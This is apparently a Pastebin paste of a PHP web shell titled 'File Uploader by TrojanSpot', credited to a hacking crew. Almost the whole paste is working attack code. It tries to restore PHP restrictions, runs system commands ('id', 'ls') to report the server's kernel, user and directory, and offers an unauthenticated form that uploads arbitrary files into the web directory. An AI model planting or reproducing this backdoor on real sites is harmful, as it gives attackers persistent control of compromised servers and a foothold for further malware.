Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Act - Crew . Org <br>
- <html><head> <title>File Uploader by TrojanSpot</title> </head><body bgcolor ="black">
- <?php
- ini_restore("safe_mode");
- ini_restore("open_basedir");
- $SO = php_uname() ;
- $dir = getcwd() ;
- $ID = "id";
- $LS = "ls";
- $idd = $output = system($ID);
- echo "<p align ='center'><font size='4' color='red' > <b>Kernel :</b> $SO </p></font>";
- echo "<p align ='top'><font color='yellow'> <b>id: $idd </b></p> ";
- echo "<br>";
- echo "<p align ='top'><font color='white'> <b>Directory :</b> $dir </p>";
- echo "<p align ='top'><font color='green'> <b>File Directory: </b> </p>";$output = system($LS);
- echo "<br><br>";
- print_r('<form action="" method="post" enctype="multipart/form-data">
- <input name="arquivo" type="file" /><input name="" type="submit" value="Upload" />');
- $arquivo=$_FILES['arquivo']['name'];
- if(move_uploaded_file($_FILES['arquivo']['tmp_name'], "".$arquivo)){
- echo "<html><script>window.alert('Upload Complete Mas Bro!');</script></html>";
- echo "<html><script>window.location.href=window.location.href;</script></html> ";}
- ?></body></html>
Add Comment
Please, Sign In to add comment